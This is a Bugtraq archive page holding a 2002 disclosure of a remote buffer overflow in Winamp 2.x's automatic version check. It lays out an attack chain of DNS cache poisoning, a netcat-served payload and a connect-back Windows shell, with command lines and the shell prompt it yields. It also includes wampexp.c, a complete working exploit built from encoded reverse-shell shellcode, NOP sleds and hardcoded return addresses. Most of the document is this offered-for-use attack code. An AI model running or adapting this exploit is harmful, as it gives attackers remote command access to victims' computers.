Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

remote winamp 2.x exploit (all current versions)

From: 2c79cbe14ac7d0b8472d3f129fa1df <c79cbe14ac7d0b8472d3f129fa1df55 () yahoo com>
Date: Fri, 5 Jul 2002 08:13:43 -0700 (PDT)
2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory
NĂºmero Dos

winamp has an option, enabled by default, which checks
on startup for the latest version from www.winamp.com
and will then notify the user of a possible upgrade
via messagebox..

unfortunately, if it were to receive a huge response,
the thread parsing the data is thrown into an infinite
loop and eventually the exception dispatcher is
called.. and then like most of the time under windows,
a big, bad, overflow occurs..

but how do we exploit this without hAXING
www.winamp.com..?

well.. that's up to you.. cache poisoning would be the
simplest.. or maybe some other, even more illicit,
means?

below is a simple attack:
---------------------------------------------------

nameserver - 192.168.0.1
attacker - 192.168.1.2
victim (windows machine) - 192.168.0.2

1) attacker poisons nameserver cache

192.168.1.2:

x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2


2) victim is now resolving www.winamp.com to attacker
machine

192.168.0.2:
C:>nslookup www.winamp.com
Server:  z3.names.int
Address:  192.168.0.1

Name:    www.winamp.com
Address:  192.168.1.2


3) attacker fires up exploit as web daemon

192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80


4) attacker waits for connect-back by exploit

192.168.1.2:

x@x:~$ nc -l -p 5555


5) foolish winamp user opens winamp!

192.168.0.2:

opens winamp, prepares for The Weather Girls - It's
Raining Men.mp3


6) BOOJAH!@

192.168.1.2:

x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:>

---------------------------------------------------

this is definitely exploitable on me/xp as well.. but
I don't have me or softice working in xp..

attached is the exploit for windows 2000 which will
spawn a connect-back cmd.exe to the user, and will be
completely transparent.. winamp will function as
normal even when cmd.exe terminates as we are just
exiting that current thread

I have also included a simple patch which just
hardcodes 205.188.245.120 in place of www.winamp.com..
no loss of functionality, so you will get a nice
messagebox when winamp 2.80b is released ;>

oh, and hushmail.. 3 weeks idle deactivation time my
ass.. I only wanted to be elite but now I have to
settle for hackers sniffing my yahoo..

yours truly, 2c79cbe14ac7d0b8472d3f129fa1df55

__________________________________________________
Do You Yahoo!?
Sign up for SBC Yahoo! Dial - First Month Free
http://sbc.yahoo.com

Attachment: wapatch.zip
Description: wapatch.zip

/*
        wampexp.c
        July 3rd, 2002
        
        Winamp 2.80a and all previous remote exploit (connect-back styles)

        winamp has an option, enabled by default, which checks for the latest
        version from www.winamp.com and will then notify the user of a possible
        upgrade via a messagebox..
        
        unfortunately, if it were to receive a huge response via some nameserver
        corruption the thread parsing the response is thrown into an infinite
        loop and eventually the exception dispatcher is called.. and THEN like
        most of the time under windows a big, bad, overflow occurs..
        
        ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80
            # nc -l -p 5555
            *poisoned user opens winamp*
            # nc -l -p 5555
            Microsoft Windows 2000 [Version 5.00.2195]
            (C) Copyright 1985-2000 Microsoft Corp.
            
            C:\>
        
        sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55
        (c79cbe14ac7d0b8472d3f129fa1df55 () yahoo com)
        
        yes, yahoo took away my 2! ;~~~
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/errno.h>
#include <unistd.h>

// a minimal HTTP header and fake version
unsigned char payload[35904] =
"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";

// a gruesome hack of dark spyrits jill.c shell that further alters the
// startupinfo structure (as this isn't a service) and calls ExitThread
// to keep things invisible..

unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";

main(char argc, char **argv){
        int i;
        unsigned short int      a_port;
        unsigned long           a_host;
        struct hostent          *ht;
        struct sockaddr_in      sin;    
        
        if (argc < 3){
                printf("Winamp 2.80a remote exploit (7/3/2002)\n");
                printf("c79cbe14ac7d0b8472d3f129fa1df55 () yahoo com\n\n");
                printf("usage: %s <localhost> <localport>\n\n", argv[0]);
                printf("NOTE: target os is 2000.. probably works on all\n");
                printf("winamp versions prior to 2.80a as there are no \n");
                printf("dependancies on winamp, only the static ws2help\n\n");
                exit(-1);
        }

        // blatantly ripped! *TEEHEEEHHEH*
        a_port  = htons(atoi(argv[2]));
        a_port ^= 0x9595;
        if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}
        a_host  = *((unsigned long *)ht->h_addr);
        a_host ^= 0x95959595;
        shell[385] = ((a_port) & 0xff);
        shell[386] = ((a_port >> 8) & 0xff);        
        shell[390] = ((a_host) & 0xff);
        shell[391] = ((a_host >> 8) & 0xff);
        shell[392] = ((a_host >> 16) & 0xff);
        shell[393] = ((a_host >> 24) & 0xff);
        
        strcat(payload, shell);
        
        // lots of NOPs
        for(i=792;i<9704;i++)
                strcat(payload, "\x90");

        // we land here when we jmp ebx the second time
        // this sets ebx to the start of our shell, and jmps back
        strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");
        strcat(payload, "\x11\x01\xff\xe3");

        // lots more NOPs for lots more fun
        for(i=9718;i<35809;i++)
                strcat(payload, "\x90");
 
        // and bh, dl; jmp ebx.. this allows us to jmp back into an area
        // where we can put some real code
        strcat(payload, "\x22\xfa\xff\xe3");
        
        // our "eip" (call ecx; ntdll.dll@0x11936)
        // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)
        strcat(payload, "\xd6\x19\x02\x75");

        // if ws2help doesn't match for some reason, use this call ebx..
        // dependant on the winamp in_wm.dll plugin
        //strcat(payload, "\x57\x22\x12\x01");
 
        strcat(payload, "\x0d\x0a");

        printf("%s", payload);        
}
Previous By Date Next
Previous By Thread Next

Current thread: